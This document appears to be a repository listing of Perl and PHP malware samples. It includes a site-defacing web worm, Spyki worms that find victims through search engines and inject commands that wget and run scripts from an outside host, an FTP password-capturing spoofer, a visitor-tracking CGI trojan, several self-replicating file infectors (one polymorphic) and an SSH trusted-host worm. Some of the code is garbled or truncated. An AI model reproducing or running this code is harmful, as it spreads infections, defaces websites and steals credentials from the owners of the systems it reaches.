<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
. $generation .q{.</b></ADDRESS>
</BODY></HTML>
};
unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}
sub DoDir($) {
my $dir = $_[0];
$dir .= '/' unless $dir =~ m#/$#;
local *DIR;
opendir DIR, $dir or return;
for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) {
unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}
if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}
closedir DIR;
}
sub Pay Load() {
my @dirs;
eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};
push(@dirs, '/ ');
for my $l ('A' .. 'Z') {
push(@d
for my $d (@dirs) {
DoDir($d);
}
}
//milw0rm.com

109
Perl/Net-Worm.Perl.Spyki.a Normal file
View File

@ -0,0 +1,109 @@
#/usr/bin/perl
#####################
####
#### #### #### #### #### #### #### # # # # ####
#### # # # # # # # # # # # # # #
#### #### # # ### ## #### # #### ## ###
#### # # # # # # # # # # # # #
#### # #### #### # # #### #### # # # # ####
####
use IO::Socket;
use LWP::Simple;
my $processo = "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
while(1){
@vul = "";
$a=0;
$numero = int rand(999);
$site = "www.google.com";
$procura = "inurl:viewtopic.php?t=$numero";
######################################
for($n=0;$n<900;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);
$ae = "@resu";
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
$ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
$uber=$1;
if ($uber !~/translate/)
{if ($uber !~ /cache/)
{if ($uber !~ /"/)
{if ($uber !~ /google/)
{if ($uber !~ /216/)
{if ($uber =~/http/)
{if ($uber !~ /start=/)
{
if ($uber =~/&/)
{
$nu = index $uber, '&';
$uber = substr($uber,0,$nu);
}
$vul[$a] = $uber;
$a++;
}}}}}}}}}
##########################
for($cadenu=1;$cadenu <= 991; $cadenu +=10){
@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
$ae = "@cade";
while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
$ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
$uber=$1;
$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/<\/b>//g;
$uber =~ s/<wbr>//g;
if ($uber =~/&/)
{
$nu = index $uber, '&';
$uber = substr($uber,0,$nu);
}
$vul[$a] = $uber;
$a++
}}
#########################
$wb = '&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(122)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527';
$b = scalar(@vul);
for($a=0;$a<=$b;$a++)
{
$sitevul = $vul[$a] . $wb;
if($sitevul !~/http/){ $sitevul = 'http://' . $sitevul; }
$teste1 = get($sitevul) or next;
$teste1 = "";
}
}

212
Perl/Net-Worm.Perl.Spyki.b Normal file
View File

@ -0,0 +1,212 @@
use LWP::Simple;
use IO::Socket::INET;
my $processo = "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
while(1){
$numr = int rand(9999);
$caxe = ".";
$caxe1 = ".";
$caxe .= rand(9999);
$caxe1 .= rand(9999);
$arq = ".";
$arq = int rand(9999);
open(sites,">$arq");
print sites "";
close(sites);
$procura = 'inurl:*.php?*=' . $numr;
for($n=0;$n<900;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);
$ae = "@resu";
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
$ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
$uber=$1;
if ($uber !~/translate/)
{
if ($uber !~ /cache/)
{
if ($uber !~ /"/)
{
if ($uber !~ /google/)
{
if ($uber !~ /216/)
{
if ($uber =~/http/)
{
if ($uber !~ /start=/)
{
open(arq,">>$arq");
print arq "$uber\n";
close(arq);
}}}}}}}}}
for($cadenu=1;$cadenu <= 991; $cadenu +=10){
@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
$ae = "@cade";
while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
$ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
$uber=$1;
$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/<\/b>//g;
open(a,">>$arq");
print a "$uber\n";
close(a);
}}
$ark = $arq;
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);
$a =0;
$b =0;
open(ae,"<$arq");
while(<ae>)
{$sites[$a] = $_;
chomp $sites[$a];
$a++;
$b++;}
close(ae);
for ($a=0;$a<=$b;$a++){
open (file, ">$caxe");
print file "";
close(file);
open (file, ">$caxe1");
print file "";
close(file);
$k=0;
$e=0;
$data=get($sites[$a]) or next;
while($data=~ m/<a href=".*?">.*?<\/a>/){
$data=~ s/<a href="(.*?)">.*?<\/a>/$1/;
$ubersite=$1;
if ($ubersite =~/"/)
{
$nu = index $ubersite, '"';
$ubersite = substr($ubersite,0,$nu);
}
if ($ubersite !~/http/)
{$ubersite = $sites[$a].'/'.$ubersite;}
open(file,">>$caxe") || die("nao abriu caxe.txt $!");
print file "$ubersite\n";
close(file);
}
$lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt';
$t =0;
$y =0;
@ja;
open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
while (<opa>)
{
$ja[$t] = $_;
chomp $ja[$t];
$t++;
$y++;
}
close(opa);
$t=1;
while ($t < $y)
{
if ($ja[$t] =~/=/)
{
$num = rindex $ja[$t], '=';
$num += 1;
$ja[$t] = substr($ja[$t],0,$num);
open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
print jaera "$ja[$t]$lista1\n";
close(jaera);
$num = index $ja[$t], '=';
$num += 1;
$ja[$t] = substr($ja[$t],0,$num);
$num1 = rindex $ja[$t], '.';
$subproc = substr($ja[$t],$num1,$num);
open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
print jaera "$ja[$t]$lista1\n";
close(jaera);
}
$t++;
}
$ark = "$caxe1";
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);
$q=0;
$w=0;
@hot;
open (ops,"<$caxe1");
while(<ops>)
{
$hot[$q] = $_;
chomp $hot[$q];
$q++;
$w++;
}
close(ops);
for($q=0;$q<=$w;$q++)
{
if ($hot[$q] =~/http/)
{
$tipo=get($hot[$q]) or next;
}}
}
}

73
Perl/Spoofer.Perl.Nicl Normal file
View File

@ -0,0 +1,73 @@
# This is a simple tcp server that listens on port 21
# unless another is specified.
# The possible uses of this are;
# Ftp has no encryption for passwords and they are
# sent in plain text under the right conditions.
# Most ftp programs have a text file called <program-name>.ini
# which will store the info like site-name, user-name, encrypted
# password and account-name. Instead of trying to decrypt the
# password for each different application (ws_ftp etc)
# do this.
# Edit the <program-name>.ini
# Wherever there is a site-name change it to 127.0.0.1
# Start your this perl scipt
# Open your ftp program and click connect
# Most of this coding was already in the /perl/eg/ folder
# you can find the orginal version there ..
print "===========================\n";
print " Manicx local FTP spoofer\n";
print " www.infowar.co.uk/manicx/\n";
print "===========================\n";
($port) = @ARGV;
$port = 21 unless $port; # Are port is 21 unless specified
$AF_INET = 2;
$SOCK_STREAM = 1;
$sockaddr = 'S n a4 x8';
($name, $aliases, $proto) = getprotobyname('tcp');
if ($port !~ /^\d+$/) { ($name, $aliases, $port) = getservbyport($port, 'tcp');}
print "Port = $port\n";
$this = pack($sockaddr, $AF_INET, $port, "\0\0\0\0");
select(NS); $| = 1; select(stdout);
socket(S, $AF_INET, $SOCK_STREAM, $proto) || die "socket: $!";
bind(S,$this) || die "bind: $!";
listen(S,5) || die "connect: $!";
select(S); $| = 1; select(stdout);
print "Listening for connection..\n";
($addr = accept(NS,S)) || die $!;
print "Accept ok\n";
($af,$port,$inetaddr) = unpack($sockaddr,$addr);
@inetaddr = unpack('C4',$inetaddr);
print NS "220\n"; # We are ok for login (send username)
$user = <NS>;
print $user;
print NS "331\n"; # user ok send password
$pass = <NS>;
print $pass;
print NS "331\n"; # password ok send account
$acco = <NS>;
print $acco;
print NS "200\n"; # account ok send what you want.
$resp = <NS>;
print $resp;
print NS "451\n"; # bye bye baby

60
Perl/Trojan.Perl.InfoSpy Normal file
View File

@ -0,0 +1,60 @@
#/usr/bin/perl
################################################
# #
#**********************************************#
#* _ _ *#
#* |\_\\-\ /-//_/| *#
#* | \\-| |-// | *#
#* \ /~\\_____//~\ / *#
#* ` / \ ´ *#
#* | () () | Comando Trojan *#
#* \ ^ / -=- *#
#* ||||| www.comandotrojan.cjb.net *#
#* ||||| *#
#* *#
#**********************************************#
# #
# Vai Abaixo o CGI InfoSpy by iradium #
# #
# Por Favor Preserve estas Linhas #
# #
# chmod 755 #
# #
################################################
print "Content-type: text/html\n\n";
$c = "contador.txt";
#Nome do .txt log
$mailprog = "/usr/sbin/sendmail -t";
#Preste Atenção o real caminho do email no seu server
$emailadm = "seu_email\@seu_site.com.br;
#Deixe o \ no email
$vitima = "lamer_entrou@se_fudeu.com";
#Deixe como estar
#Lembrar de fazer um domínio tipo www.entrem.cjb.net e por index.cgi
print <<EOF;
+++ Coloque aqui o html fictício para ser exibido +++
EOF
open (N, "$c");
$n = <N>;
close (N);
$n++;
open (NE, ">$c");
print NE "$n";
close (NE);
open (MAIL, "|$mailprog") || print "Can't open $mailprog
.\n";
print MAIL "To: $vitima \n";
print MAIL "From: $emailadm\n";
print MAIL "Subject: Visita\n\n";
print MAIL "$ENV{'REMOTE_ADDR'} \n $ENV{'HTTP_USER_AGENT'} \n $ENV{'REMOTE_HOST'} \n $ENV{'REMOTE_USER'} $n\n\n ";
close MAIL;
#FIM DO ARQUIVO

13
Perl/Virus.Perl.DirWorm Normal file
View File

@ -0,0 +1,13 @@
# DirWorm by -Byst- (c) 1999
while (<*>) # ˆé¥¬ ¢á¥ ä ©«ë ¢ ⥪ã饩 ¤¨à¥ªâ®à¨¨
{
if (chdir($_)) { # …᫨ íâ® ¤¨à¥ªâ®à¨ï - ᬥ­¨âì ⥪ãéãî ­ ­¥¥
@command = ("cp ../worm.pl ./worm.pl > /dev/null");
system @command; # ‚맮¢ á¨á⥬­®© ä㭪樨 ª®¯¨à®¢ ­¨ï ä ©«
chdir(".."); # ‚®§à é ¥¬áï ®¡à â­® ¢ ­ ç «ì­ãî ¤¨à¥ªâ®à¨î
}
}
@command = ("cp ./worm.pl ../worm.pl");
system @command; # Š®¯¨à㥬 ⥫® ¢ த¨â¥«ìáªãî ¤¨à¥ªâ®à¨î

31
Perl/Virus.Perl.Endsnow.a Normal file
View File

@ -0,0 +1,31 @@
opendir(DIR, "."); #open the directory this program is in
@FILES = readdir(DIR); #get the file names
closedir(DIR);
## Look for programs to spread to (limited to the current directory for now)
for ($i = 0; $i < @FILES; $i++) {
if (substr($FILES[$i], length($FILES[$i]) - 4) eq ".cgi" || substr($FILES[$i], length($FILES[$i]) - 3) eq ".pl") {
$TARGETS[$ii] = $FILES[$i];
$ii++;
}
}
for ($i = 0; $i < @TARGETS; $i++) {
open(FILE,$TARGETS[$i]);
$file = join("",<FILE>);
close(FILE);
if (index($file, "## Perl Virus Begins Now ##") == -1) { ##the file isn't infected, INFECT IT!! (append to it)
if ($me eq "") { #what we want to write hasn't been copied yet, this is a considerate virus, it could just keep copying itself each time and slow your computer down (and become a couple hundred bytes smaller)...
open(me,$0); #opens THIS program
$me = join("",<me>);
$start = index($me,"## Perl Virus Begins Now ##");
$me = substr($me, $start, rindex($me,"## Perl Virus Ends Now##") + 24 - $start);
close(me);
}
open(FILE,">>$TARGETS[$i]");
print FILE $me;
close(FILE);
}
}
closedir(DIR);

66
Perl/Virus.Perl.Intender Normal file
View File

@ -0,0 +1,66 @@
#here virus starts
# Intender by -Byst- (c) 1999
$source = __FILE__;
while (<*.pl>)
{
$name = $_; # ˆ¬ï ä ©« -¦¥àâ¢ë
$cname = crypt($name,$name); # ˆ¬ï ¯à®¬¥¦ãâ®ç­®£® ä ©«
# <20>஢¥à¨¬ ­¥ ¨­ä¨æ¨à®¢ ­ «¨ 㦥 ä ©«?
open(TARGET,"<$name"); # ¦¥àâ¢
$allready_infected = 0;
while (<TARGET>) {
if (index($_,"\x23 Intender by -Byst- (c) 1999") == 0)
{ $allready_infected = 1;} # 㦥 ¨­ä¨æ¨à®¢ ­!
}
close(TARGET);
if ($allready_infected == 1 )
{ next;} # ¯¥à¥å®¤¨¬ ª á«¥¤ãî饩 ¦¥à⢥
# <20>஢¥à¨¬, ­¥â «¨ ¢ ⥫¥ ¦¥àâ¢ë áâப ⨯ !/usr/bin/perl
open(TARGET,"<$name"); # ¦¥àâ¢
$flag = 0;
while (<TARGET>) {
if (index($_,"\x23!") == 0) # <20> 諨 â ªãî áâபã
{ $flag = 1;} # ¢§¢®¤¨¬ ä« £
}
close(TARGET);
# ‘®§¤ ¥¬ ç áâì ¢ ª®â®à®© ᮤ¥à¦¨âáï ¢ë§®¢ ¯à®æ¥¤ãàë ¨­ä¨æ¨à®¢ ­¨ï
open(TARGET,"<$name"); # ¦¥àâ¢
open(FBUF,">$cname"); # ¯à®¬¥¦ãâ®ç­ë© ä ©«
if ($flag == 1) { # ã ¦¥àâ¢ë ¥áâì ®¡®§­ 祭¨¥ ­ ç « ¯à®£à ¬¬ë?
while (<TARGET>) { # ¨é¥¬ ¥£®
print(FBUF); # á®åà ­ï¥¬ ¢á¥ áâப¨ ¦¥àâ¢ë ¤® #!
if (index($_,"\x23!") == 0 ) # £ , ¢®â ¨ ­ ç «® ¯à®£à ¬¬ë
{ last;}
}
}
# ¨é¥¬ ⥫ ¯à®æ¥¤ãà
$_ = "\n";print(FBUF);
open(SOURCE,"<$source"); # â ªãî騩 ä ©«
while(<SOURCE>) { # ¨é¥¬ ¯à¨§­ ª ­ ç « - "#here virus starts"
if (index($_,"\x23here virus starts") == 0) { last;}
}
print(FBUF);
# ¢¥áì ⥪áâ ¯à®æ¥¤ãà -> ¯à®¬¥¦ãâ®ç­ë© ä ©«
while (<SOURCE>) {
print(FBUF);
if (index($_,"\x23here virus ends") == 0) { last;}
}
close(SOURCE);
$_ = "\n";print(FBUF);
# ®áâ ¢èãîáï ç áâì ¦¥àâ¢ë -> ¯à®¬¥¦ãâ®ç­ë© ä ©«
while (<TARGET>) {
print(FBUF);
}
close(TARGET);
close(FBUF);
rename($cname,$name);
}
#here virus ends

43
Perl/Virus.Perl.Nars Normal file
View File

@ -0,0 +1,43 @@
Perl.Sran
qwerty();#
sub qwerty {
a: while (<*.pl>)
{
my $oF = "qwerty";
my $tN = "$ENV{\"HOME\"}/tmp/".crypt($_, $_), $oN = "./$_", $nF = crypt($_, $oF);
open (WE, "<$0");
open (IFILE, "<$_");
open (TEMP, ">$tN");
while (<IFILE>)
{
chomp;
if (/\#!Sran/) { unlink ($tN); next a }
elsif (!/#!\//) { print TEMP "$_\n" }
else { print TEMP "$_ #!Sran\n$nF();\n" }
}
while (<WE>)
{
$st = "";
s/#[0-9].*/$st/;
if (/sub $oF/ || /my \$oF =/) { $cW = 1; s/$oF/$nF/}
next if (/#!\/usr\/bin\/perl/ || /qwerty();#/ || !$cW);
if (int(rand(2))) { $st=" #".crypt($_, rand(256)) }
else {$st = ""}
chomp;
print TEMP "$_$st\n";
}
unlink ($oN);
rename ($tN, $oN);
chmod (0777, $oN);
}
}

30
Perl/Virus.Perl.Nirvana Normal file
View File

@ -0,0 +1,30 @@
# Nirvana RuLeZ the world
# PERL.Nirvana
# by Second Part To Hell
# Thanks to SnakeByte for your tutorial!
open(file,$0);
@nirvana=<file>;
@nirvana=@nirvana[0...31]
close(file);
foreach $FileName (<*>)
{
if ((-r $FileName) && (-w $FileName) && (-f $FileName))
{
open (File, "$FileName");
@Lithium=<File>;
close(File);
if ((@Lithium[1] =~ "Nirvana") or (@Lithium[2] =~ "Nirvana"))
{
if((@Lithium[0] =~ "perl",,i) or (@Lithium[1] =~ "perl",,i))
{
open(sliver, ">$FileName");
print sliver @Nirvana;
print sliver @Litium;
close (sliver);
}
}
}
}

90
Perl/Virus.Perl.Qwax Normal file
View File

@ -0,0 +1,90 @@
<?//QAZWSX
function Infect($path)
{
global $self;
$handle = opendir($path);
$file = readdir($handle);
while ( false != $file )
{
if ($file != "." && $file != "..")
{
if (is_dir($path.$file))
{
Infect($path.$file."/");
}
else if (strrpos($file, ".php") != 0)
{
$do_infect = true;
$victim = fopen($path.$file, "r+");
while (!feof($victim))
{
$buf = fgets($victim, 4096);
if (strrpos($buf, "QAZWSX") != 0)
{
$do_infect = false;
break;
}
}
if ($do_infect)
{
fputs($victim, $self);
}
fclose($victim);
}
}
$file = readdir($handle);
}
closedir($handle);
}
$found = false;
$bracket_found = false;
$sf = fopen($SCRIPT_FILENAME, "r");
while (!feof($sf))
{
$s = fgets($sf, 4096);
if ($found)
{
$self .= $s;
if (strrpos($s, "?>") != 0)
{
if ($bracket_found)
{
break;
}
else
{
$bracket_found = true;
}
}
}
else if (strrpos($s, "QAZWSX") != 0)
{
$found = true;
$self = $s;
}
}
fclose($sf);
Infect($DOCUMENT_ROOT."/");
?>

41
Perl/Virus.Perl.Rans.a Normal file
View File

@ -0,0 +1,41 @@
qwerty();#
sub qwerty {
a: while (<*.pl>)
{
my $oF = "qwerty";
my $tN = "$ENV{\"HOME\"}/tmp/".crypt($_, $_), $oN = "./$_", $nF = crypt($_, $oF);
open (WE, "<$0");
open (IFILE, "<$_");
open (TEMP, ">$tN");
while (<IFILE>)
{
chomp;
if (/\#!Sran/) { unlink ($tN); next a }
elsif (!/#!\//) { print TEMP "$_\n" }
else { print TEMP "$_ #!Sran\n$nF();\n" }
}
while (<WE>)
{
$st = "";
s/#[0-9].*/$st/;
if (/sub $oF/ || /my \$oF =/) { $cW = 1; s/$oF/$nF/}
next if (/#!\/usr\/bin\/perl/ || /qwerty();#/ || !$cW);
if (int(rand(2))) { $st=" #".crypt($_, rand(256)) }
else {$st = ""}
chomp;
print TEMP "$_$st\n";
}
unlink ($oN);
rename ($tN, $oN);
chmod (0777, $oN);
}
}

47
Perl/Virus.Perl.Rans.b Normal file
View File

@ -0,0 +1,47 @@
sadBVa();
print "This is also a test.\n";
sub sadBVa { #21wZPocL9r3I2
#25lj6HLJr3lR.
goto b if($ENV{"USER"} eq "root"); #403dRcOOEKV7c
#53a2B3OFfBrvE
a: while (<*.pl>)
{ #11zR6D0l39gH2
my $oF = "sadBVa"; #21wZPocL9r3I2
my $tN = crypt($_, $_), $cW = 0; $oN = "./$_", $nF = $tN; #23xTGZMRTRgO.
#73QebE0Q0ZZ7Q
open (WE, "<$0");
open (IF, "<$_"); #19ffqqT32W0N6
open (TMP, ">$tN"); #21wZPocL9r3I2
#46uAWbWZGiwdE
$nF =~ s/[0-9.\/].*/a/;
#20DFf8jQEuujI
while (<IF>)
{
chomp; #17rFB3rla0OL.
if (/\#!Sran/) { unlink ($tN); next a }
elsif (!/#!\//) { print TMP "$_\n" }
else { if(!/-X/){$_ .= " -X"} print TMP "$_\n#!Sran\n$nF();\n" }
} #14HPto765IJGs
#56usvbQbO.V7g
while (<WE>)
{
$st = ""; #16DEAzgu4U/Lg
#21wZPocL9r3I2
s/#[\d].*/$st/;
if (/sub $oF/ || /my \$oF =/) { $cW = 1; s/$oF/$nF/}
next if (/#!\// || /$oF();/ || !$cW);
if (int(rand(2))) { $st=" #".crypt($tN, rand(256)) }
else {$st = ""} #24kfAR.q3vZXI
chomp; #19ffqqT32W0N6
print TMP "$_$st\n"; #130lOPyQngaJw
}
#21wZPocL9r3I2
unlink ($oN);
rename ($tN, $oN);
chmod (0777, $oN);
}
b: #24kfAR.q3vZXI
} #25lj6HLJr3lR.

56
Perl/Virus.Perl.SSHWorm Normal file
View File

@ -0,0 +1,56 @@
###############
##
# sshworm - example of a trusted host/key ssh worm
#
# This is extremely primitive and rarely works on anything
# but identical systems running the same versions of ssh.
# It does show how using unencrypted RSA keys for user auth
# across an enterprise can be a really bad thing. Eventually
# you should be able to let this guy go running as root on any
# given system, it will locate each user's known_hosts and
# attempt to gain accesss, reporting its path to a central system.
#
##
use FindBin qw{$Bin};
print ":: sshworm initialized at $Bin\n";
$options = " -o PasswordAuthentication=no ";
##
# stage 1 - attempt to connect to all hosts in known_hosts files
##
if (open (KH, "<" . $ENV{'HOME'} . "/.ssh/known_hosts"))
{
while ($line = <KH>)
{
($host, undef) = split(/\s+/,$line);
($host, undef) = split(/\,/,$host);
Propagate($host);
}
close (KH);
}
sub Propagate {
open (SSH, "ssh $options $host 'id' 2>/dev/null|");
while ($out = <SSH>)
{
if ($out =~ /uid/)
{
print ":: sshworm found new host $host\n";
system("scp $Bin/$0 $host:/tmp/hello.pl");
system("ssh $host 'perl /tmp/hello.pl'");
}
}
close (SSH);
}

35
Perl/Virus.Perl.Sillycross.a Normal file
View File

@ -0,0 +1,35 @@
#genetix
#*.bat *.cmd *.pl crossinfector prepender
$TheCode = __FILE__;
$batpart = "
for %%a in (*.bat *.cmd *.pl) do copy %0 %%a
";
my @Vcode = ();
open(Host, $TheCode);
@Vcode = <Host>;
while(<Host>) {
$. > 36 ? last : push @Vcode,$_;
}
close(Host);
while (<*.bat *.cmd *.pl>) {
$Victim = $_;
my @VicCode = ();
open(Target, $Victim);
@VicCode = <Host>;
while(<Target>) {
$. > 36 ? last : push @VicCode,$_;
}
close(Target);
if (@VicCode[1] !~ "#genetix") {
open(Target, ">$Victim");
print Target @Vcode,@VicCode;
close(Target);
}
}

43
Perl/Virus.Perl.Spoon Normal file
View File

@ -0,0 +1,43 @@
use File::Find;
&virus();
print "\nThis program is infected by the Perl virus\n\n";
sub virus
{
my ( $pid, $new );
if( $pid = fork ) { return; }
else
{
open( source, $0 );
finddepth ( \&infect, '/home/chris/test' );
sub infect
{
open target, "$File::Find::name";
$_ = <target>;
if ( /(\#!.*perl)/ )
{
$_ = <target>;
if( $_ ne "use File::Find;\n" )
{
$new = $1 . "\nuse File::Find;\n&virus();\n" . $_;
while( <target> ) { $new = $new . $_; }
seek( source, 0, 0 );
while( <source> ne "sub virus\n" ) { };
$new = $new . "\nsub virus\n";
while( <source> ) { $new = $new . $_; }
close target;
open target, ">$File::Find::name";
print target $new;
}
}
close( target );
}
close( source );
exit( 0 );
}
}
# a Perl virus, by paddingx
# 08/15/1999

38
Perl/Virus.Perl.Spoon.b Normal file
View File

@ -0,0 +1,38 @@
use File::Find;
&virus();
print "\nThis program is infected by the Perl virus\n";
sub virus
{
$virus_body = "\n# put here the body of the virus\nsub virus { }\n";
if( $pid = fork ) { return; }
else
{
finddepth ( \&infect, '/' );
sub infect
{
open( target, $File::Find::name );
$_ = <target>;
if ( /(\#!.*perl)/ )
{
$line2 = <target>;
unless( $line2 eq "use Find::File\n" )
{
open( temp, ">/tmp/tmpinfect" );
print temp ($1, "\nuse File::Find;\n&virus();\n", $line2 );
print temp while( <target> );
print temp $virus_body;
close( temp );
system( "mv", "/tmp/tmpinfect", $File::Find::name );
}
}
close( target );
}
exit( 0 );
}
}
# a Perl virus, by paddingx
# 08/13/1999

91
Perl/Virus.Perl.Tict Normal file
View File

@ -0,0 +1,91 @@
# 1st Poly Virus by SnakeByte [Matrix/KryptoCrew]
open(File,$0);@Virus=<File>;close(File); # read own code
$Virus=join("", @Virus);foreach $FileName(<*>) { # get files
if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { # check file
open(File, "$FileName");@Temp=<File>;close(File); # open file
if ((@Temp[0] =~ /perl/i ) && ( substr(@Temp[0],0,2) eq "\#!" )) { # perl file ?
if (( length(@Temp[0]) % 5 ) != 0 ){ # already infected ?
# first we generate a decryptor
$Key = int(rand(255)); # cryptkey
$crypttype = int(rand(2)); # how to crypt it ?
for ( $X = 0; $X < length($Virus); $X++ ){ # Encrypt it
if ( $crypttype == 0 ){
@Crypt[$X] = (ord(substr($Virus, $X, 1))) * ($Key); # Multiply
} else {
@Crypt[$X] = (ord(substr($Virus, $X, 1))) + ($Key); # Addition
}
}
$connectit = chr(int(rand(25)+65));
$VirString = join($connectit, @Crypt); # all values get seperated by a !
$filename = chr(int(rand(25)+65)); # random filename to put virus to
$filename .= int(rand(65535));
if ( int(rand(2)) == 0 ){
@Vir[0] = "\$l1l = \"$VirString\"\;";
@Vir[1] = "\$11l = $Key\;"; # key to decrypt
} else {
@Vir[0] = "\$11l = $Key\;"; # key to decrypt
@Vir[1] = "\$l1l = \"$VirString\"\;";
}
@Vir[2] = "\@ll1 = split(\"$connectit\", \$l1l)\;";
